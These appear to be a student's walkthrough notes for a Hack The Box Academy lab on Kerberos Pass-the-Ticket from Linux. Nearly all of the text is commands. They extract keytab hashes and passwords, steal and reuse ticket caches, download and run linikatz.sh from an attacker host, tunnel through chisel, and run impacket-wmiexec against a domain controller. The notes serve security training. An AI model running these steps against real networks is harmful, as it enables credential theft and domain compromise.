# Pass the Ticket (PtT) from Linux
```
ssh david@inlanefreight.htb@10.129.234.123 -p 2222
```
```
realm list
```
```
find / -name *keytab* -ls 2>/dev/null
```
```
python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
```
```
ntlm- a738f92b3c08b424ec2d99589a9cce60
user - carlos
pass - Password5
```
```
ssh carlos@inlanefreight.htb@10.129.234.123 -p 2222
```
```
crontab -l
```
```
cat /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
```
```
python3 /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
```
```
cd ~/.scripts
ls -la
python3 /opt/keytabextract.py svc_workstations._all.kt
```
```
user - svc_workstations
pass - Password4
NTLM - 7247e8d4387e76996ff3f18a34316fdd
```
```
su svc_workstations@inlanefreight.htb
```
```
sudo -l
```
Use this to get to root
```
sudo su
```
As we can see the julio user is domain user and can attempt to get access to the domain shared folder via julio
```
id julio@inlanefreight.htb
```
```
ls -la
```
Now we can impersonate the user via export command
As you can see we have julio as default principal
```
klist
export KRB5CCNAME=krb5cc_647401106_VRIdHN
klist
```
You have to be fast to authenticate to smbclient since the ticket is just temporary
```
smbclient //dc01/julio -k -c ls -no-pass
```
```
smbclient //dc01/julio -k -c 'get julio.txt' -no-pass
ls
cat julio.txt
```
You gotta find the file containing the credentials of Linux machines in Active Directory.
```
find / -name *keytab* -ls 2>/dev/null
```
```
python3 /opt/keytabextract.py /etc/krb5.keytab
```
```
user - LINUX01$
ntlm - 5aa7d65408b1c36bb2d0892b8e53bce8
```
Or we could just use the keytab since we have permission so that we can impersonate the user linux01
```
kinit LINUX01$ -k -t /etc/krb5.keytab
klist
```
```
smbclient //dc01/linux01 -k -c ls
smbclient //dc01/linux01 -k -c 'get flag.txt'
cat flag.txt
```
***
Now for the next not required task
First we have to ssh to the machine
```
ssh svc_workstations@inlanefreight.htb@10.129.204.23 -p 2222
sudo su
```
Get the linikatz.sh
This tool will find for kerberos tickets in the system
```
wget http://10.10.15.13:8000/linikatz.sh
chmod +x linikatz.sh
./linikatz.sh
```
***
I made a visual graph about the network
Then for the next one we can try the chisel which is port forwarding tool
First we have to set the IPs in our attacker machine
```
sudo subl /etc/hosts
172.16.1.10 inlanefreight.htb inlanefreight dc01.inlanefreight.htb dc01
172.16.1.5 ms01.inlanefreight.htb ms01
```
```
sudo subl /usr/local/etc/proxychains.conf
socks5 127.0.0.1 1080
```
```
sudo ./chisel server --reverse
```
{% code overflow="wrap" %}
```
xfreerdp /v:10.129.204.23 /u:david /d:inlanefreight.htb /p:Password2 /dynamic-resolution
```
{% endcode %}
```
cd tools
chisel.exe client 10.10.15.13:8080 R:socks
```
But first we have to get the Julio's ccache file from the linux machine
```
ssh svc_workstations@inlanefreight.htb@10.129.204.23 -p 2222
ls -la
```
`
Then we will change the permission so that we can copy it using scp
```
chmod 644 krb5cc_647401106_ZN5b8D
```
{% code overflow="wrap" %}
```
scp -P 2222 svc_workstations@inlanefreight.htb@10.129.215.254:/tmp/krb5cc_647401106_ZN5b8D .
```
{% endcode %}
Then we are going to export the ccache file so that we can connect to the dc01 as julio
{% code overflow="wrap" %}
```
export KRB5CCNAME=/home/kyou/academy-htb/password-attacks/pass-the-ticket/krb5cc_647401106_ZN5b8D
```
{% endcode %}
Then just use proxychains4 from the home directory to connect to dc01
```
./proxychains4 impacket-wmiexec dc01 -k
```
```
./proxychains4 impacket-wmiexec ms01 -k
```
